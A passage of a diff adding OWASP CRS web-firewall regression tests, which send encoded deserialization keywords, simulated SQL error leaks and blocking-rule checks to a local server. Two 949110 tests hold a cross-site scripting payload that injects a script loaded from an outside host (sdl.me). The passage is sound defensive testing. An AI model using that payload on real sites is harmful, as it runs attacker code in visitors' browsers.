Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-318 + desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-319 + desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-320 + desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-321 + desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: 
+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-322 + desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-323 + desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-324 + desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-325 + desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-326 + desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-327 + desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-328 + desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-329 + desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-330 + desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml new file mode 100644 index 00000000..02507151 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml 
@@ -0,0 +1,91 @@ +--- +meta: + author: "studersi" + enabled: true + name: "949110.yaml" + description: | + Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking + rule to be triggered. +tests: + - test_title: 949110-1 + desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "949110" + - test_title: 949110-2 + desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: / + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.cnn.com + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + no_log_contains: id "949110" + - test_title: 949110-3 + desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + 
Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"949110\"" + - test_title: 949110-4 + desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"949110\"" + - test_title: 949110-5 + desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml new file mode 100644 index 00000000..be9efacd --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951110.yaml" + description: "Regression tests for rule 951110" +tests: + - test_title: 951110-1 + desc: "Matching Microsoft Access SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression" + output: + log_contains: "id \"951110\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml new file mode 100644 index 00000000..72200968 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951120.yaml" + description: "Regression tests for rule 951120" +tests: + - test_title: 951120-1 + desc: "Matching Oracle SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended" + output: + log_contains: "id \"951120\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml new file mode 100644 index 00000000..2c8e7a70 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951130.yaml" + description: "Regression tests for rule 951130" +tests: + - test_title: 951130-1 + desc: "Matching DB2 SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE" + output: + log_contains: "id \"951130\"" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml new file mode 100644 index 00000000..64750bbd --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951140.yaml" + description: "Regression tests for rule 951140" +tests: + - test_title: 951140-1 + desc: "Matching EMC SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: '[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: "A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in"' + output: + log_contains: "id \"951140\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml new file mode 100644 index 00000000..139c3817 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951150.yaml" + description: "Regression tests for rule 951150" +tests: + - test_title: 951150-1 + desc: "Matching firebird SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error" + output: + log_contains: "id \"951150\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml new file mode 100644 index 00000000..d57698b8 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951160.yaml" + description: "Regression tests for rule 951160" +tests: + - test_title: 951160-1 + desc: "Matching Frontbase SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback." + output: + log_contains: "id \"951160\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml new file mode 100644 index 00000000..effc5864 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951170.yaml" + description: "Regression tests for rule 951170" +tests: + - test_title: 951170-1 + desc: "Matching hsqldb SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)" + output: + log_contains: "id \"951170\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml new file mode 100644 index 00000000..8a0dbec4 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951180.yaml" + description: "Regression tests for rule 951180" +tests: + - test_title: 951180-1 + desc: "Matching informix SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: '[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread "main" java.sql.SQLException: An illegal character has been found in the statement.' + output: + log_contains: "id \"951180\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml new file mode 100644 index 00000000..4ca909e7 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951190.yaml" + description: "Regression tests for rule 951190" +tests: + - test_title: 951190-1 + desc: "Matching ingres SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)" + output: + log_contains: "id \"951190\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml new file mode 100644 index 00000000..b7212c5a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951200.yaml" + description: "Regression tests for rule 951200" +tests: + - test_title: 951200-1 + desc: "Matching interbase SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']." + output: + log_contains: "id \"951200\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml new file mode 100644 index 00000000..03824bd5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml 
@@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951210.yaml" + description: "Regression tests for rule 951210" +tests: + - test_title: 951210-1 + desc: "Matching maxDB SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length" + output: + log_contains: "id \"951210\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml new file mode 100644 index 00000000..6dc042ea --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml 
@@ -0,0 +1,48 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951220.yaml" + description: "Regression tests for rule 951220" +tests: + - test_title: 951220-1 + desc: "Matching mssql SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375" + output: + log_contains: "id \"951220\"" + + - test_title: 951220-2 + desc: "Matching mssql SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int." + output: + log_contains: "id \"951220\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml new file mode 100644 index 00000000..f82cc793 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml 
@@ -0,0 +1,47 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951230.yaml" + description: "Regression tests for rule 951230" +tests: + - test_title: 951230-1 + desc: "Matching MySQL SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'." + output: + log_contains: "id \"951230\"" + - test_title: 951230-2 + desc: "Matching MySQL SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'" + output: + log_contains: "id \"951230\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml new file mode 100644 index 00000000..d9e26975 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml 
@@ -0,0 +1,47 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951240.yaml" + description: "Regression tests for rule 951240" +tests: + - test_title: 951240-1 + desc: "Matching PostgreSQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56" + output: + log_contains: "id \"951240\"" + - test_title: 951240-2 + desc: "Matching PostgreSQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 